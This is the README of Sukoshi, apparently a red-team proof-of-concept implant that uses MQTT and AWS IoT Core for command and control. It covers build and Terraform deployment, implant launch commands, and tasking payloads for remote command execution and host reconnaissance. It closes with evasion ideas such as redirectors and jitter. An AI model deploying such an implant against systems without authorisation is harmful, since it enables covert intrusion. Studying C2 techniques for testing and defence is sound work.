Sukoshi is a proof-of-concept Python/C++ implant that leverages the MQTT protocol for C2 and uses AWS IoT Core as infrastructure. It is intended to demonstrate the use of MQTT for C2 and the way in which IoT cloud services can be integrated with an implant.
Note: This project was not built to be used in a production setting. It is designed as a proof-of-concept and it intentionally omits many features that would be expected in a modern C2 project. For OPSEC considerations, see here.
- Automated setup and deployment of an implant using MQTT for C2. Can be used to easily test and analyze an implant leveraging this protocol.
- Connects AWS IoT Core to an implant. Can be further expanded to integrate AWS services such as IoT Analytics for logging/data analysis/visualization and IoT Events for automated response to significant data events.
C2 operators face many challenges such as having to manage a fleet of agents, implement a secure communications channel, quickly respond to events and log/analyze/visualize data. These same issues are being addressed by cloud providers who offer IoT services. As a result, they can be leveraged for C2 and implant management. This project uses AWS IoT Core as infrastructure, but other providers could possibly be re-purposed for C2 as well (Azure IoT, HiveMQ).
AWS offers sophisticated IoT services and capabilities that can be readily adapted for C2. As an example, telemetry from operators and implants can be stored, prepared, analyzed and fed into machine learning models using IoT Analytics. The IoT Device Defender service can be used to run regular audits on deployed implants, check for anomalous activity and produce alerts.
Telemetry gathered in IoT Core is not restricted to IoT services. Using Rules for AWS IoT, your implant data can be forwarded to many other services in the AWS ecosystem. You can do things like pass the data to Lambda functions, store it in DynamoDB or S3, send the data to Amazon Machine Learning to make predictions based on an Amazon ML model, start execution of a Step Functions state machine, and much more.
I believe that this project only scratches the surface of what can be done with cloud IoT service providers. The time saved by not needing to implement these capabilities by yourself is enormous. You can instantly get access to sophisticated services that are highly benficial to C2 operators.
The AWS IoT Python libraries are needed by the implant and can be installed with the steps below:
- From the root of the Sukoshi project, navigate to the
/pythondirectory - Execute the following command to install the Python dependencies:
pip install -r requirements.txt
- A Windows 10 host was used as the environment for testing/compilation.
- Visual Studio 2019 was used for development of this project.
- The Visual Studio package Desktop Development with C++ was installed to support building the implant in C++.
- CMake was used to build and install the required AWS IoT libraries, it can be installed here.
- vcpkg was used to build and install the required Boost Property Tree libraries, it can be installed here.
- Git is needed to fetch the required libraries from GitHub and can be installed for Windows here.
The AWS IoT C++ libraries and Boost Property Tree libraries are needed by the implant and can be installed with the steps below:
I've used the script located here to automate installation of the AWS IoT libraries on my host. I've used the script located here to automate installation of vcpkg and the Boost Property Tree libaries on my host. You may be able to use these scripts to perform the same automated installs on your host or you can use them as a template for your own custom installation.
To build the AWS IoT C++ libraries, create a directory within a short path (e.g. C:\dev\iotsdk), navigate into the newly created directory and execute the following commands:
mkdir sdk-cpp-workspace
cd sdk-cpp-workspace
git clone --recursive https://github.com/aws/aws-iot-device-sdk-cpp-v2.git
mkdir aws-iot-device-sdk-cpp-v2-build
cd aws-iot-device-sdk-cpp-v2-build
cmake -DCMAKE_INSTALL_PREFIX="C:\dev\iotsdk\sdk-cpp-workspace" ../aws-iot-device-sdk-cpp-v2
cmake --build . --target install --config "Release"
To build the Boost Property Tree libraries, navigate to the location of your vcpkg install and execute the following commands:
.\vcpkg.exe install boost-property-tree:x64-windows
.\vcpkg.exe integrate install
The included Visual Studio project should be pre-configured to include all the required directories and dependencies. It has been hardcoded with the C:\dev\iotsdk\sdk-cpp-workspace path for the AWS IoT SDK dependencies. If you would like to select an alternative path for these dependencies, perform the following steps where C:\dev\iotsdk\sdk-cpp-workspace is replaced with your custom installation path:
- Set the following flags in the solution:
Release,x64 - In project properties, set "C/C++ > General > Additional Include Directories" to
C:\dev\iotsdk\sdk-cpp-workspace\include - In project properties, set "Linker > Input > Additional Dependencies" to:
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-crt-cpp.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-mqtt.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-event-stream.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-checksums.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-s3.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-auth.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-http.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-io.lib
Secur32.lib
Crypt32.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-compression.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-cal.lib
NCrypt.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-sdkutils.lib
C:\dev\iotsdk\sdk-cpp-workspace\lib\aws-c-common.lib
BCrypt.lib
Kernel32.lib
Ws2_32.lib
Shlwapi.lib
kernel32.lib
user32.lib
gdi32.lib
winspool.lib
shell32.lib
ole32.lib
oleaut32.lib
uuid.lib
comdlg32.lib
advapi32.lib
- In project properties, set "C/C++ > Language > Conformance mode" to
No (/permissive). Otherwise, when you try to execute a build, you will get an error for the fileStringView.hon line 861:
Error C7527 'Traits': template parameter name cannot be redeclared
- If you are interested in tracking the status of this issue, see the following: aws/aws-iot-device-sdk-cpp-v2#372
This project includes Terraform files to automate deployment of the AWS IoT Core infrastructure that is needed by the implant.
The following resources will be created in the target AWS account:
- AWS IoT Certificate
- AWS IoT Policy
- AWS IoT Thing
The certificates needed to connect the implant with AWS infrastructure will be created in the /terraform/certs folder.
The process for setting this up is as follows:
- Ensure you have Terraform setup and installed (https://learn.hashicorp.com/tutorials/terraform/install-cli)
- Ensure you have AWS user credentials with the proper IAM permissions configured on the CLI (https://docs.aws.amazon.com/cli/latest/userguide/getting-started-quickstart.html). For testing purposes, you can attach the managed policy AWSIoTConfigAccess to the user.
- From the command line, navigate to the
/terraformfolder - Execute the following commands to setup the required infrastructure using Terraform:
terraform init
terraform plan
terraform apply
- Take note of the
python_implant_command_lineandcpp_implant_command_lineoutput from Terraform, it will be used to start the implant builds for Python and C++ respectively - Execute the following command to destroy the infrastructure when finished testing:
terraform destroy
The implant has been configured with very basic functionality to demonstrate the usage of MQTT for C2 and integration with AWS IoT Core. For simplicity, interaction with the implant by an operator is primarily done through the MQTT test client in the AWS IoT Core console page.
The following is an example of the end-to-end flow for the implant C2:
- Navigate to the AWS IoT Core console page
- Under the "Test" dropdown in the sidebar, click "MQTT test client"
- On the "Subscribe to a topic" tab in the "Topic filter" field, enter
c2/resultsas a topic and click "Subscribe". Note thatc2/resultsappears under the "Subscriptions" window. - Repeat the above step for the
c2/taskingandc2/heartbeattopics. For convenience, you may choose to favorite each of these subscribed topics by clicking the heart icon. - There are two builds of the implant (Python/C++) and their execution instructions will vary:
- For Python, navigate to the root directory of Sukoshi and start the implant by executing the command line obtained from the Terraform output (
python_implant_command_line), a sample can be seen below:
python ./python/implant.py --endpoint example-ats.iot.us-east-1.amazonaws.com --cert terraform/certs/sukoshi_implant.cert.pem --key terraform/certs/sukoshi_implant.private.key --client-id sukoshi_client_id --port 443
- For C++, compile the implant by opening the Visual Studio solution (
/cpp/Sukoshi/Sukoshi.sln) and building withRelease,x64flags. Start the implant by opening a PowerShell terminal window, navigating to the root directory of Sukoshi and executing the command line obtained from the Terraform output (cpp_implant_command_line), a sample can be seen below:
./cpp/Sukoshi/x64/Release/Sukoshi.exe --endpoint example-ats.iot.us-east-1.amazonaws.com --cert terraform/certs/sukoshi_implant.cert.pem --key terraform/certs/sukoshi_implant.private.key --client-id sukoshi_client_id --port 443
- Observe that output begins to appear in the
c2/heartbeatchannel - Click on the "Publish to a topic" tab and enter
c2/taskingin the "Topic name" field - In the "Message payload" field, enter the following:
{
"task": "ping",
"arguments": ""
}
- Click the "Publish" button and observe that the task is published to the
c2/taskingtopic in "Subscriptions" - Observe the implant receiving the task, performing the work and publishing results. The following sample is from the Python build:
Publishing message to topic 'c2/heartbeat': {"contents": "heartbeat", "success": "true"}
Received message from topic 'c2/tasking': b'{\n "task": "ping",\n "arguments": ""\n}'
Publishing message to topic 'c2/heartbeat': {"contents": "heartbeat", "success": "true"}
Publishing message to topic 'c2/results': {"contents": "pong", "success": "true"}
- Observe the results appear in the
c2/resultstopic:
{
"contents": "pong",
"success": "true"
}
- To view other sample tasking payloads, see the Supported Tasks section. Tasking format will be the same for both Python and C++ builds.
The following are sample payloads for supported tasks you can paste into the "Message payload" field within the AWS "MQTT test client" page.
Execute an OS command and retrieve the results. In this case, the whoami command is provided.
{
"task": "exec",
"arguments": "whoami"
}
Gather basic details about the host where the implant is running, including host name and OS info.
{
"task": "host-recon",
"arguments": ""
}
Send a ping and get back a pong. Simple task used to validate end-to-end C2.
{
"task": "ping",
"arguments": ""
}
Set the time the implant should wait before executing tasks and returning results. Time is in seconds.
{
"task": "set-dwell-time",
"arguments": "10"
}
Ask the implant to end the beaconing loop and disconnect from the endpoint.
{
"task": "exit",
"arguments": ""
}
Due to the PoC nature of this project, it was not built with OPSEC in mind. However, I will outline some possible features that could be present in a production deployment of this kind of project:
- Automated setup of redirectors to obscure the AWS IoT endpoint
- Overhaul of command execution tasking to support stealthier implementations
- Leverage alternate IoT cloud service providers as a fallback
- Variable beaconing using jitter
- Encryption of tasking and results in the event that the communications channel is compromised
- Daniel Abeles (@Daniel_Abeles) and Moshe Zioni for their work while at Akamai Threat Research. Their MQTT-PWN project served as an excellent reference during development:
- Soracom Labs, for the Terraform AWS IoT setup files: https://github.com/soracom-labs/soracom-beam-to-aws-iot-terraform
- AWS for their IoT Device SDK sample code: